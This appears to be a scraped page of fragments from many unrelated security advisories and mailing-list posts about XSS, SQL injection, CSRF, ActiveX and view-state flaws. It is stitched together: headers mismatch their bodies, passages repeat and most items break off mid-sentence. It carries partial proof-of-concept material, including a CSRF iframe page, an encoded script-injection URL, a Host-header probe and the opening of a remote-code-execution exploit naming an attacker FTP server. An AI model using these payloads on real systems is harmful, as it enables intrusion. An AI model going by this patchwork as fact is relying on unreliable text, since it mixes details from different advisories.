Next Page >>
html
conducted and published in 2008 [1]. This advisory describes a
vulnerability that provides access to the contents of any file stored in
the local filesystem of user's machines running vulnerable versions of IE.
Exploitation of the vulnerability relies solely on the ability for a
would-be attacker to provide malicious HTML content from a website and
to predict the full pathname for the file that will be used to cache it
locally on the victim's system. If the entire path name can be
predicted, the attacker can cause a redirection to the locally stored
file using an URI specified in UNC form and force the local content to
be rendered as an HTML document, which will permit to run scripting
-----Original Message-----
From: Core Security Technologies Advisories [mailto:advisories@coresecurity.com]
Sent: Tuesday, September 25, 2007 6:21 PM
To: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk; vulnwatch@vulnwatch.org; NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: CORE-2007-0817: Remote Command execution, HTML and JavaScript injection vulnerabilities in AOL's Instant Messaging software
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies – CoreLabs Advisory
Hash: SHA1
Core Security Technologies – CoreLabs Advisory
http://www.coresecurity.com/corelabs
Remote command execution, HTML and JavaScript injection vulnerabilities in
AOL’s Instant Messaging software
*Advisory Information*
Title: Remote Command execution, HTML and JavaScript injection
Vulnerability ID: HTB23043
Reference: https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_sit_support_incident_tracker.html
Product: SiT! Support Incident Tracker
Vendor: The Support Incident Tracker Project ( http://sitracker.org/ )
Vulnerable Version: 3.64 and probably prior
Tested Version: 3.64
Vendor Notification: 24 August 2011
Vulnerability Type: SQL Injection, XSS, CSRF
Status: Fixed by Vendor
Risk level: High
1) Input passed to the "clientid" parameter in "www/admin/banner-
acl.php", "www/admin/banner-edit.php", "www/admin/campaign-zone.php",
"www/admin/advertiser-campaigns.php", "www/admin/campaign-
banners.php", and "www/admin/banner-activate.php" is not properly
sanitised before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in
the context of an affected site.
2) Input passed to the "orderdirection" and "listorder" parameters in
"www/admin/userlog-index.php" and "www/admin/stats.php" is not
properly sanitised before being returned to the user. This can be
CVE-2009-1687
The JavaScript garbage collector in WebKit does not properly handle allocation
failures, which allows remote attackers to execute arbitrary code or cause a
denial of service (memory corruption and application crash) via a crafted HTML
document that triggers write access to an "offset of a NULL pointer."
CVE-2009-1690
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in osCmax, which can be exploited to perform SQL Injection and Cross-Site Scripting (XSS) attacks.
1) Multiple Cross-Site Scripting (XSS) in osCmax: CVE-2012-1664
1.1 Input passed via the "username" POST parameter to /admin/login.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
<form action="http://[host]/admin/login.php?action=process" method="post" name="main" id="main">
More Details
============
To prevent the execution of JavaScript and VBScript code in HTML emails
and to remove unwanted HTML tags, the IceWarp WebMail Server filters HTML
emails with the function cleanHTML() that is defined in the PHP file
html/webmail/server/inc/tools.php
For more information refer to the bulletin:
http://www.microsoft.com/technet/security/bulletin/ms08-048.mspx
Workarounds communicated by the vendor include:
* Locking down the MHTML protocol handler. Below are the required
registry changes.
/-----------
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet
HTTP/1.1 403 Forbidden
Date: Sun, 18 May 2008 02:25:31 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 590
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
Vulnerability ID: HTB23015
Reference: http://www.htbridge.ch/advisory/easewe_ftp_ocx_activex_control_execute_insecure_method.html
Product: Easewe FTP OCX ActiveX Control
Vendor: Easewe Software ( http://www.ftpocx.com )
Vulnerable Version: 4.5.0.9 and probably prior
Tested on: 4.5.0.9
Vendor Notification: 01 June 2011
Vulnerability Type: ActiveX Control Insecure Method
Risk level: High
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )
I. Description
The Palm Pre WebOS version 1.0.4 and below allows a remote attacker to execute arbitrary HTML code on the phone via certain applications. The affected applications involve the native email client via the notifications system as well as the native calendar application.
The vendor has been contacted and a patch has been released:
WebOS 1.1 - http://kb.palm.com/wps/portal/kb/na/pre/p100eww/sprint/solutions/article/50607_en.html#11
II. Impact
The site URL and title are extracted and put in clear
text at begin of the 2000 bytes block.
The preview content which appears on
opera:historysearch page for the site is compressed
into the file md.dat. However, the HTML encoding is
not consistent across the URL scheme of the site and
the injection is possible in the optional fragment of
the URL (after the # character).
The following sequence summarises an attack scenario:
Vulnerabilities in kses-based HTML filters
==========================================
During internal code review performed by Allegro.pl, some weaknesses
were discovered in kses - PHP HTML/XHTML filter. HTML filters using or
based on kses are part of many popular projects, including WordPress,
Moodle, Drupal, eGroupWare, Dokeos, PHP-Nuke, Geeklog and others. Issues
found range from cross-site scripting to code execution, depending on
implementation.
The 'Host:' header
The URL
The HTTP method
If we probe for XSS using the 'Host:' header, Apache correctly filters the angle brackets and replaces them with HTML entities:
REQUEST:
GET / HTTP/1.1
Host: <BADCHARS>
modifies the remote administration to allow any user to connect externally,
and modifies the DNS information.
## smcd3g-csrf-poc.htm
<html>
<body>
<iframe src="./smcd3g-csrf-poc-1.htm" width="1" height="1">
</iframe>
<iframe src="./smcd3g-csrf-poc-2.htm" width="1" height="1">
</iframe>
---[ Vulnerability description ]
Positive Research Center has discovered multiple XSS vulnerabilties in Kayako Support Suite.
Application insufficiently verifies subscriberdata incoming parameter in /staff/index.php?_m=news&_a=importexport script.
An attacker with "staff" privileges can use the vulnerabilty to inject and execute arbitrary HTML code and scripts in a user's browser within the trust relationship between the browser and the server.
To use the vulnerability an attacker should convince a user with "staff" privileges to open URL like:
http://example.com/support/staff/index.php?_m=news&_a=managesubscribers&importsub=1&resultdata=YTo0OntzOjEzOiJzdWNjZXNzZW1haWxzIjtpOjA7czoxMjoiZmFpbGVkZW1haWxzIjtpOjE7czoxMToidG90YWxlbWFpbHMiO2k6MTtzOjk6ImVtYWlsbGlzdCI7czo5MDoiPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD5APHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4uPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4gIjt9
Application insufficiently verifies subject incoming parameter in /staff/index.php?_m=news&_a=insertnews script.
An attacker with "staff" privileges can use the vulnerabilty to inject and execute arbitrary HTML code and scripts in a user's browser within the trust relationship between the browser and the server.
An attacker should trick a user with "staff" privileges to open URL like:
Published: 2010-02-08 Version: 1.1
SpiderLabs has documented view state tampering
vulnerabilities in three products from separate vendors.
View states are used by some web application frameworks to
store the state of HTML GUI controls. View states are
typically stored in hidden client-side input fields,
although server-side storage is widely supported.
The affected vendors generally recommend that client-side
view states are cryptographically signed and/or encrypted,
>> message box asking the user's permission to call the given number. The
>> user is presented with the simple choice to either press call or
>> cancel.
>>
>> A TEL URI can be opened automatically if the TEL URI is used as the
>> source of an HTML iframe or frame, as the URL of a meta refresh, as
>> the location of a HTTP 30X redirect, and as the location of the
>> current or a new window using javascript.
>>
>> We discovered a security vulnerability that dismisses the "ask for
>> permission to call" dialog in a way that chooses the "call" option
The key part of the advisory for me wasn't VIEWSTATE as much as it was the controls, but this statement you made seemed pretty outrageous (with regard to ASP.NET):
'These vulnerabilities show that unsigned client-side viewstates will ALWAYS result in a vulnerability in the affected products.'
I would disagree - it depends how the software developer implemented use of the VIEWSTATE's content. In ASP.NET, the interesting part here was that you appeared to be controlling an innerhtml property of a Form control through the VIEWSTATE. What your example didn't show, I'm assuming, is some code behind that pulled out the <IndexedString> and set the value in the form's innerHtml property/attribute. That's just dangerous coding, akin to trusting client-side input and no different than acting on client input that came from any method, form input, JSON, etc. Your repro was a bit confusing/misleading without that part. Otherwise, were you saying that some controls inherently populate their properties/attributes from VIEWSTATE content automagically?
There have been past discussions on VIEWSTATE's security:
Scott Mitchell documented tampering VIEWSTATE in a 2004 article:
http://msdn.microsoft.com/en-us/library/ms972976.aspx#viewstate_topic12
>>> message box asking the user's permission to call the given number. The
>>> user is presented with the simple choice to either press call or
>>> cancel.
>>>
>>> A TEL URI can be opened automatically if the TEL URI is used as the
>>> source of an HTML iframe or frame, as the URL of a meta refresh, as
>>> the location of a HTTP 30X redirect, and as the location of the
>>> current or a new window using javascript.
>>>
>>> We discovered a security vulnerability that dismisses the "ask for
>>> permission to call" dialog in a way that chooses the "call" option
Published: 2010-02-08 Version: 1.1
SpiderLabs has documented view state tampering
vulnerabilities in three products from separate vendors.
View states are used by some web application frameworks to
store the state of HTML GUI controls. View states are
typically stored in hidden client-side input fields,
although server-side storage is widely supported.
The affected vendors generally recommend that client-side
view states are cryptographically signed and/or encrypted,
message box asking the user's permission to call the given number. The
user is presented with the simple choice to either press call or
cancel.
A TEL URI can be opened automatically if the TEL URI is used as the
source of an HTML iframe or frame, as the URL of a meta refresh, as
the location of a HTTP 30X redirect, and as the location of the
current or a new window using javascript.
We discovered a security vulnerability that dismisses the "ask for
permission to call" dialog in a way that chooses the "call" option
AdPeeps Ad Rotator - XSS and HTML Injection Vulnerabilities
Version Affected: 8.5d1 (3-18-09) (newest)
Info: Ad Peeps is a banner rotator and text ad rotator - all in one that allows you to track, sell and manage banner ads, rich-media/flash ads and text ads on your website. Built using PHP/MYSQL, Ad Peeps provides you and your advertisers with highly detailed real-time statistics and is capable of delivering millions of impressions per day on a typical shared web server. - Plus, you can try it right now on your website with our 7 day trial.
Ad Peeps is so versatile that it can even show your text ads Yahoo! Style or Google AdWords Style. Unlike many other banner ad rotator programs, Ad Peeps was skillfully designed to use minimal server resources while maintaining speed and unparalleled performance. Built on a highly scalable and versatile database architecture, Ad Peeps works without fuss even on high traffic web sites and won't crash your high powered website..
Opinion: AdPeeps, along with many others should really hire people to audit their code.
While discussion of the vulnerability is great, it would be nice for us to retain some credit; the advisory represents the culmination of a lot of research work. The PDF that accompanies the hacking-lab movie is basically just a copy & paste from our advisory with no attribution. Anyone that goes to the hacking-lab website directly would incorrectly assume that the movie & PDF represent original research work by Compass Security.
I imagine that videos of our BlackHat presentation (http://www.blackhat.com/html/bh-dc-10/bh-dc-10-archives.html#Byrne ) will hit the web soon too. We have a live demo of the .Net vulnerability and the JavaServer Faces exploit.
Thanks,
David Byrne
Senior Security Consultant
Trustwave - SpiderLabs, Application Security
> message box asking the user's permission to call the given number. The
> user is presented with the simple choice to either press call or
> cancel.
>
> A TEL URI can be opened automatically if the TEL URI is used as the
> source of an HTML iframe or frame, as the URL of a meta refresh, as
> the location of a HTTP 30X redirect, and as the location of the
> current or a new window using javascript.
>
> We discovered a security vulnerability that dismisses the "ask for
> permission to call" dialog in a way that chooses the "call" option
///////////////////////////////////
//Remote code execution PoC exploit
///////////////////////////////////
<html>
<head>
<script language="JavaScript">
var attackersFtpServerAddress="attacker.ftp.server";
The XSS(UTF7) exist in mod_autoindex.c . Charset is not defined and we can provide XSS attack using "P" option available in apache 2.2.4 by setting Charset to UTF-7.
"P=pattern lists only files matching the given pattern"
More : http://httpd.apache.org/docs/2.0/mod/mod_autoindex.html
- -Source code from mod_autoindex.c--------------
#if APR_HAS_UNICODE_FS
ap_set_content_type(r, "text/html;charset=utf-8");
#else
login" setting by default, which makes it easier for remote
attackers to conduct session fixation attacks.
CVE-2010-1614
Multiple cross-site scripting (XSS) vulnerabilities allow
remote attackers to inject arbitrary web script or HTML via
vectors related to (1) the Login-As feature or (2) when the
global search feature is enabled, unspecified global search
forms in the Global Search Engine.
CVE-2010-1615
login" setting by default, which makes it easier for remote
attackers to conduct session fixation attacks.
CVE-2010-1614
Multiple cross-site scripting (XSS) vulnerabilities allow
remote attackers to inject arbitrary web script or HTML via
vectors related to (1) the Login-As feature or (2) when the
global search feature is enabled, unspecified global search
forms in the Global Search Engine.
CVE-2010-1615
Next Page>>
|
